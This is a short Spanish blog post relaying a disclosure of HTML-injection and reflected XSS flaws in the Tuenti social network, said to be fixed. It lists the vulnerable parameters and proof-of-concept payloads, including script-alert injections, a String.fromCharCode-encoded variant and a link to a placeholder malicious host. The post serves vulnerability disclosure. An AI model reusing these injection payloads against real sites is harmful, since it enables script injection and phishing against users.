Multiples nuevas vulneralidades en Tuenti que han sido corregidas

Como noticia sobre la seguridad de Tuenti, descubrimos en meneame múltiples fallos de seguridad en Tuenti que han sido corregidos y han sido publicados en SecurityFocus;


INYECCIÓN HTML:

Ir a –> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos
Variable GET vulnerable –> ‘cat_id’
Nota: Aquí no fue posible un ataque XSS

PRUEBA DE CONCEPTO:
http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos”><A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>

Devuelve –> Nuevo enlace en el pie de página
CROSS SITE SCRIPTING (XSS):

Condición: Ser usuario registrado
Condición-extra: Ser amigos (víctima/atacante)

Ir a –> http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64
699031
Variable GET vulnerable –> ‘items’

PRUEBA DE CONCEPTO:
http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64
699031″><script>alert(‘y3nh4ck3r was here’)</script>

Devuelve –> Mensaje de alerta
Condición: Ser usuario registrado 
Condición-extra: Nada

Ir a –> http://www.tuenti.com/#m=videos&view=category&cat_id=upload
Variable GET vulnerable –> ‘cat_id’

PRUEBA DE CONCEPTO:
http://www.tuenti.com/#m=videos&view=category&cat_id=upload”><script>ale
rt(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,
104,101,114,101,33))</script>

Devuelve –> Mensaje de alerta
Condición: Nada
Condición-extra: Nada

Ir a –> http://www.tuenti.com/?need_invite=1
Variable POST vulnerable –> ‘email’

PRUEBA DE CONCEPTO:
email=”><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,11
4,32,119,97,115,32,104,101,114,101,33))</script>

Devuelve –> Mensaje de alerta

OBSERVACIÓN FINAL:
El equipo de trabajo ha fijado con éxito estas vulnerabilidades 😉

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

*Acepta la Política de Privacidad